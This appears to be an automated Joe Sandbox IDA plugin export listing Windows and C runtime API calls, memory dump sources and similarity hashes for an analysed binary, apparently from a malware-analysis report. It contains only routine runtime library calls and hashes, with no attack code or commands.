Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6f0000_external.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• _ValidateLocalCookies.LIBCMT ref: 00707977
• ___except_validate_context_record.LIBVCRUNTIME ref: 0070797F
• _ValidateLocalCookies.LIBCMT ref: 00707A08
• __IsNonwritableInCurrentImage.LIBCMT ref: 00707A33
• _ValidateLocalCookies.LIBCMT ref: 00707A88
Strings
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm$&p
• API String ID: 1170836740-3788419405
APIs
Similarity
• API ID: __freea$__alloca_probe_16$Info
• String ID:
• API String ID: 127012223-0
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 00706AB0
• __alloca_probe_16.LIBCMT ref: 00706ADC
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 00706B1B
• LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00706B38
• LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00706B77
• __alloca_probe_16.LIBCMT ref: 00706B94
• LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00706BD6
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00706BF9
Similarity
• API ID: ByteCharMultiStringWide$__alloca_probe_16
• String ID:
• API String ID: 2040435927-0
APIs
Similarity
• API ID: _strrchr
• String ID:
• API String ID: 3213747228-0
APIs
• type_info::operator==.LIBVCRUNTIME ref: 00712945
• CallUnexpected.LIBVCRUNTIME ref: 00712BBE
Strings
Similarity
• API ID: CallUnexpectedtype_info::operator==
• String ID: Tr$csm$csm$csm
• API String ID: 2673424686-18262871
APIs
• GetCurrentThreadId.KERNEL32 ref: 00705C93
• AcquireSRWLockExclusive.KERNEL32(?,?,?,00705C5C,?,00000000,?,006FB93C,?,?,006FD94E), ref: 00705CB2
• AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,00705C5C,?,00000000,?,006FB93C,?,?,006FD94E), ref: 00705CE0
• TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,00705C5C,?,00000000,?,006FB93C,?,?,006FD94E), ref: 00705D3B
• TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,00705C5C,?,00000000,?,006FB93C,?,?,006FD94E), ref: 00705D52
Strings
Similarity
• API ID: AcquireExclusiveLock$CurrentThread
• String ID: \\p
• API String ID: 66001078-3706482082
APIs
• __EH_prolog3.LIBCMT ref: 0070295D
• std::_Lockit::_Lockit.LIBCPMT ref: 00702968
• std::_Lockit::~_Lockit.LIBCPMT ref: 007029D6
  • Part of subcall function 0070285F: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00702877
• std::locale::_Setgloballocale.LIBCPMT ref: 00702983
• _Yarn.LIBCPMT ref: 00702999
Strings
                                                                                                          Similarity
                                                                                                          • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                          • String ID: &p
                                                                                                          • API String ID: 1088826258-2011850372
                                                                                                          • Opcode ID: a095bf3942434431949f093274c2097c0c1303bd21cc13bb0e141b6049a10e4d
                                                                                                          • Instruction ID: a380cf9d3bf36d08520c7cd6ab2ddc23610bbccd432a872a7ea6fea13686284c
                                                                                                          • Opcode Fuzzy Hash: a095bf3942434431949f093274c2097c0c1303bd21cc13bb0e141b6049a10e4d
                                                                                                          • Instruction Fuzzy Hash: 4C015E76A00120DBDB06EB60D85A57D7BA1BF84350B188209E811673D2CF7C6E43CB95
                                                                                                          APIs
                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,48E58DFA,?,?,00000000,00723374,000000FF,?,0070CAFD,0070C9E4,?,0070CB99,00000000), ref: 0070CA71
                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0070CA83
                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,00723374,000000FF,?,0070CAFD,0070C9E4,?,0070CB99,00000000), ref: 0070CAA5
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                          • String ID: CorExitProcess$mscoree.dll$&p
                                                                                                          • API String ID: 4061214504-39180574
                                                                                                          • Opcode ID: b99ec9209e3818365a68404b2ee92fa9fe8f0e207631b0a757efa442b15eccce
                                                                                                          • Instruction ID: c769dff73a3eb576c2e04d8809250ec3dacad102b9806732acee5ba92f5a3522
                                                                                                          • Opcode Fuzzy Hash: b99ec9209e3818365a68404b2ee92fa9fe8f0e207631b0a757efa442b15eccce
                                                                                                          • Instruction Fuzzy Hash: 9D016771A04669EFDB21DF54DC05BAEBBF8FB04B15F048625F815A22D0DB7CAD00CA94
                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00706CC1
                                                                                                          • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00706CCF
                                                                                                          • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00706CE0
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                          • String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                          • API String ID: 667068680-1047828073
                                                                                                          • Opcode ID: 6089c07f586e2bd40d08079466cb428fd3d8557963d30549d3523d07fcb380b5
                                                                                                          • Instruction ID: 46e8a7c5a13696bcd68f1f9891c47a52cabd365738ed48d4872ef208ee4103c3
                                                                                                          • Opcode Fuzzy Hash: 6089c07f586e2bd40d08079466cb428fd3d8557963d30549d3523d07fcb380b5
                                                                                                          • Instruction Fuzzy Hash: 64D0A9B6582330AF93309FB0BC0CC863BA4EB143133518022F804C3260DABC28828F9A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: aaa0319f0589ac9f00698e72a5e8eb41a9feffe27011965ac385472c008538d7
                                                                                                          • Instruction ID: 8e0c2cba209c16a56be0be65b44620f3d5758836c2f1085d77ff53f65e46d2d9
                                                                                                          • Opcode Fuzzy Hash: aaa0319f0589ac9f00698e72a5e8eb41a9feffe27011965ac385472c008538d7
                                                                                                          • Instruction Fuzzy Hash: 82B1D1B0A44289EBDB12DFDCD845BED7BB0BF49300F148258E411A72D2C77C9982CB55
                                                                                                          APIs
                                                                                                          • GetLastError.KERNEL32(?,?,00711FA5,00707361,00706681), ref: 00711FBC
                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00711FCA
                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00711FE3
                                                                                                          • SetLastError.KERNEL32(00000000,00711FA5,00707361,00706681), ref: 00712035
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                                          • String ID:
                                                                                                          • API String ID: 3852720340-0
                                                                                                          • Opcode ID: 30ccbd51a750eccbc939057450176c1b04d262b28a3ae376ed1d7be9c49d8926
                                                                                                          • Instruction ID: 35b35f485d9cfd9f04e3b26c336a7bdfff731753dc4386dc350a4e11e51f25fa
                                                                                                          • Opcode Fuzzy Hash: 30ccbd51a750eccbc939057450176c1b04d262b28a3ae376ed1d7be9c49d8926
                                                                                                          • Instruction Fuzzy Hash: C701283620A2119DB7382A7E7C899A62644DB55775B210729F520480F2EF9E5C82D5D4
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AdjustPointer
                                                                                                          • String ID: &p
                                                                                                          • API String ID: 1740715915-2011850372
                                                                                                          • Opcode ID: 3d83ba3ff7ac4a86f2665dedd3c7b029559834f5a05574e09584424443f965e2
                                                                                                          • Instruction ID: 4d6bfdd26f00d12ae072f71b959521f204f1f0db1df145343c45bb518a121679
                                                                                                          • Opcode Fuzzy Hash: 3d83ba3ff7ac4a86f2665dedd3c7b029559834f5a05574e09584424443f965e2
                                                                                                          • Instruction Fuzzy Hash: 5B51E372A00602DFDB298F18D845BFA73A5FF44710F154529E801476D2EB39ECE2CB90
                                                                                                          APIs
                                                                                                          • __EH_prolog3.LIBCMT ref: 007043A0
                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 007043AA
                                                                                                            • Part of subcall function 006F4D90: std::_Lockit::_Lockit.LIBCPMT ref: 006F4DBE
                                                                                                            • Part of subcall function 006F4D90: std::_Lockit::~_Lockit.LIBCPMT ref: 006F4DE9
                                                                                                          • codecvt.LIBCPMT ref: 007043E4
                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 0070441B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
                                                                                                          • String ID: &p
                                                                                                          • API String ID: 3716348337-2011850372
                                                                                                          • Opcode ID: 506d8cb0db9a3463f029d912b9310726df4b4734a9783c3ec21b66c43e43a34c
                                                                                                          • Instruction ID: 93ea3c62fded4d867549748a38f1da0faa229706059481cc5a68a9f407c995ad
                                                                                                          • Opcode Fuzzy Hash: 506d8cb0db9a3463f029d912b9310726df4b4734a9783c3ec21b66c43e43a34c
                                                                                                          • Instruction Fuzzy Hash: A301C076900119DBCB01EB64D819ABEB7F1AF80321F648618F5106B3D2CF7C9E018B90
                                                                                                          APIs
                                                                                                          • __alloca_probe_16.LIBCMT ref: 00714952
                                                                                                          • __alloca_probe_16.LIBCMT ref: 00714A1B
                                                                                                          • __freea.LIBCMT ref: 00714A82
                                                                                                            • Part of subcall function 007131C1: RtlAllocateHeap.NTDLL(00000000,?,?,?,007022A9,?,?,006F3E32,00001000,?,006F3D7A), ref: 007131F3
                                                                                                          • __freea.LIBCMT ref: 00714A95
                                                                                                          • __freea.LIBCMT ref: 00714AA2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                          • String ID:
                                                                                                          • API String ID: 1423051803-0
                                                                                                          APIs
                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 0071272D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Similarity
                                                                                                          • API ID: ___except_validate_context_record
                                                                                                          • String ID: csm$csm$&p
                                                                                                          • API String ID: 3493665558-454717502
                                                                                                          APIs
                                                                                                          • __EH_prolog3.LIBCMT ref: 007055F1
                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 007055FB
                                                                                                            • Part of subcall function 006F4D90: std::_Lockit::_Lockit.LIBCPMT ref: 006F4DBE
                                                                                                            • Part of subcall function 006F4D90: std::_Lockit::~_Lockit.LIBCPMT ref: 006F4DE9
                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 0070566C
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                                          • String ID: &p
                                                                                                          • API String ID: 1383202999-2011850372
                                                                                                          APIs
                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0071DDCD,00000000,?,007321B8,?,?,?,0071DD04,00000004,InitializeCriticalSectionEx,0072808C,00728094), ref: 0071DD3E
                                                                                                          • GetLastError.KERNEL32(?,0071DDCD,00000000,?,007321B8,?,?,?,0071DD04,00000004,InitializeCriticalSectionEx,0072808C,00728094,00000000,?,00712E6C), ref: 0071DD48
                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0071DD70
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                          • String ID: api-ms-
                                                                                                          • API String ID: 3177248105-2084034818
                                                                                                          APIs
                                                                                                          • GetConsoleOutputCP.KERNEL32(48E58DFA,00000000,00000000,?), ref: 0071B13A
                                                                                                            • Part of subcall function 007132D1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00714A78,?,00000000,-00000008), ref: 00713332
                                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0071B38C
                                                                                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0071B3D2
                                                                                                          • GetLastError.KERNEL32 ref: 0071B475
                                                                                                          Similarity
                                                                                                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                          • String ID:
                                                                                                          • API String ID: 2112829910-0
                                                                                                          APIs
                                                                                                            • Part of subcall function 007132D1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00714A78,?,00000000,-00000008), ref: 00713332
                                                                                                          • GetLastError.KERNEL32 ref: 00718F67
                                                                                                          • __dosmaperr.LIBCMT ref: 00718F6E
                                                                                                          • GetLastError.KERNEL32 ref: 00718FA8
                                                                                                          • __dosmaperr.LIBCMT ref: 00718FAF
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                          • String ID:
                                                                                                          • API String ID: 1913693674-0
                                                                                                          APIs
                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 0071A301
                                                                                                            • Part of subcall function 007132D1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00714A78,?,00000000,-00000008), ref: 00713332
                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0071A339
                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0071A359
                                                                                                          Similarity
                                                                                                          • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                          • String ID:
                                                                                                          • API String ID: 158306478-0
                                                                                                          APIs
                                                                                                          • WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,007216CF,00000000,00000001,?,?,?,0071B4C9,?,00000000,00000000), ref: 007221F7
                                                                                                          • GetLastError.KERNEL32(?,007216CF,00000000,00000001,?,?,?,0071B4C9,?,00000000,00000000,?,?,?,0071AE0F,?), ref: 00722203
                                                                                                            • Part of subcall function 00722254: CloseHandle.KERNEL32(FFFFFFFE,00722213,?,007216CF,00000000,00000001,?,?,?,0071B4C9,?,00000000,00000000,?,?), ref: 00722264
                                                                                                          • ___initconout.LIBCMT ref: 00722213
                                                                                                            • Part of subcall function 00722235: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,007221D1,007216BC,?,?,0071B4C9,?,00000000,00000000,?), ref: 00722248
                                                                                                          • WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,007216CF,00000000,00000001,?,?,?,0071B4C9,?,00000000,00000000,?), ref: 00722228
                                                                                                          Similarity
                                                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                          • String ID:
                                                                                                          • API String ID: 2744216297-0
                                                                                                          • Opcode ID: c3465759d21e69fef68dac549f8d76810e9358c1a28abbe7f9cf0710f3ded974
                                                                                                          • Instruction ID: 9ec4ba48eabb14d153ea36a4283fc248e4160f72164ac6483f98988d185c11d6
                                                                                                          • Opcode Fuzzy Hash: c3465759d21e69fef68dac549f8d76810e9358c1a28abbe7f9cf0710f3ded974
                                                                                                          • Instruction Fuzzy Hash: AEF03036500125FBCF322F91EC0899A7F66FB093E1B068110FE1895131C73ACD22EB95
                                                                                                          APIs
                                                                                                            • Part of subcall function 00713413: GetLastError.KERNEL32(00000000,?,00715749), ref: 00713417
                                                                                                            • Part of subcall function 00713413: SetLastError.KERNEL32(00000000,?,?,00000028,0070F7C9), ref: 007134B9
                                                                                                          • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,0070D04D,?,?,?,00000055,?,-00000050,?,?,?), ref: 00717BA2
                                                                                                          • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,0070D04D,?,?,?,00000055,?,-00000050,?,?), ref: 00717BD9
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$CodePageValid
                                                                                                          • String ID: utf8
                                                                                                          • API String ID: 943130320-905460609
                                                                                                          • Opcode ID: 9eed5722c2fb14f4a7023777117901f4dfd32ae1b2cbbe33eb25e5639a223ec8
                                                                                                          • Instruction ID: 7ca79e30c7f6bee015b7cadf0695f75ed04bac13922f46bd9209eca36d1bec93
                                                                                                          • Opcode Fuzzy Hash: 9eed5722c2fb14f4a7023777117901f4dfd32ae1b2cbbe33eb25e5639a223ec8
                                                                                                          • Instruction Fuzzy Hash: E351A271608305AADB39AF78CC86BE673B8AF44740F144469FA059B1C1EB78DAC0C6F5
                                                                                                          APIs
                                                                                                          • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00712B4B,?,?,00000000,00000000,00000000,?), ref: 00712C6F
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: EncodePointer
                                                                                                          • String ID: MOC$RCC
                                                                                                          • API String ID: 2118026453-2084237596
                                                                                                          • Opcode ID: b1922e2d8d7e34f6a94906914d0177cc945b973b2f49212884dad69673fd645f
                                                                                                          • Instruction ID: 8b9a61e9876d1901028b4a7097a0d4a51419b12f4f39f21833e761ea94dacef4
                                                                                                          • Opcode Fuzzy Hash: b1922e2d8d7e34f6a94906914d0177cc945b973b2f49212884dad69673fd645f
                                                                                                          • Instruction Fuzzy Hash: E5418D71A00209EFCF25DF98DD81AEEBBB5FF48304F144159FA0467292D33999A2DB51
                                                                                                          APIs
                                                                                                          • __alloca_probe_16.LIBCMT ref: 00703114
                                                                                                          • RaiseException.KERNEL32(?,?,?,?), ref: 00703139
                                                                                                            • Part of subcall function 00707223: RaiseException.KERNEL32(E06D7363,00000001,00000003,00705F93,?,?,?,?,00705F93,00001000,0072E1AC,00001000), ref: 00707284
                                                                                                            • Part of subcall function 0070F7B9: IsProcessorFeaturePresent.KERNEL32(00000017,0070A37B,?,?,?,?,00000000), ref: 0070F7D5
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
                                                                                                          • String ID: csm
                                                                                                          • API String ID: 1924019822-1018135373
                                                                                                          • Opcode ID: c5a701cf5a2c2af8dbde39289d965c0acf855289a21bd105ca1e6084b3ed9c4e
                                                                                                          • Instruction ID: d08952085c064cf3593fbf1f5c6ea19f0b88b95e06b5975774926c6287da6314
                                                                                                          • Opcode Fuzzy Hash: c5a701cf5a2c2af8dbde39289d965c0acf855289a21bd105ca1e6084b3ed9c4e
                                                                                                          • Instruction Fuzzy Hash: 3921AC32D0121CEBCF24DFD9D889AAEB7F9EF08710F140609E405AB690C738AE45CB91
                                                                                                          APIs
                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0070288E
                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 007028EA
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                          • String ID: &p
                                                                                                          • API String ID: 593203224-2011850372
                                                                                                          • Opcode ID: 6b37727daba47a4e712535a4679772574bf2cf0862c137dbfee7e6bafb339080
                                                                                                          • Instruction ID: e770f920fbe517fe8bcdceccd89e76d08a0c05097b54847a994bf567538f1beb
                                                                                                          • Opcode Fuzzy Hash: 6b37727daba47a4e712535a4679772574bf2cf0862c137dbfee7e6bafb339080
                                                                                                          • Instruction Fuzzy Hash: F1018C36600218EFCB15DB18C899E9977B8EF84350B1440A9E801AB3E1DB74FE46CB50
                                                                                                          APIs
                                                                                                          • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 006F51C2
                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 006F520C
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: std::_$Locinfo::_Locinfo_dtorLockitLockit::~_
                                                                                                          • String ID: <Oo
                                                                                                          • API String ID: 3286764726-2027743973
                                                                                                          • Opcode ID: ff2c69196ce1864e9ada42a47a0e228b79ffdf9dd25cad2aeb9fb52937600be8
                                                                                                          • Instruction ID: 8ee3d9b3c5482025f780d07d55f4a165f233b2adb9676360b3a8c4d72c175666
                                                                                                          • Opcode Fuzzy Hash: ff2c69196ce1864e9ada42a47a0e228b79ffdf9dd25cad2aeb9fb52937600be8
                                                                                                          • Instruction Fuzzy Hash: 8EF059309041489BCB49FBB8D5A567DBB76AE4431CF08006CD60667343EA319A94CB69
                                                                                                          APIs
                                                                                                          • GetSystemTimePreciseAsFileTime.KERNEL32(?,?,00705D09,\\p,?,?,?,?,00705C5C,?,00000000,?,006FB93C,?,?,006FD94E), ref: 00706D27
                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?,48E58DFA,?,?,00723357,000000FF,?,007069F4,?,?,?,?,00706A18,00000000,?), ref: 00706D2B
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: Time$FileSystem$Precise
                                                                                                          • String ID: &p
                                                                                                          • API String ID: 743729956-2011850372
                                                                                                          • Opcode ID: 5960d7e861ab78e2f07920647689978033a2185d746aa84049bffa040cd1864a
                                                                                                          • Instruction ID: aeaf9485a3b82d6b90cb95144c29a57bce0f73a2ffcf22910b7924c30859fe5b
                                                                                                          • Opcode Fuzzy Hash: 5960d7e861ab78e2f07920647689978033a2185d746aa84049bffa040cd1864a
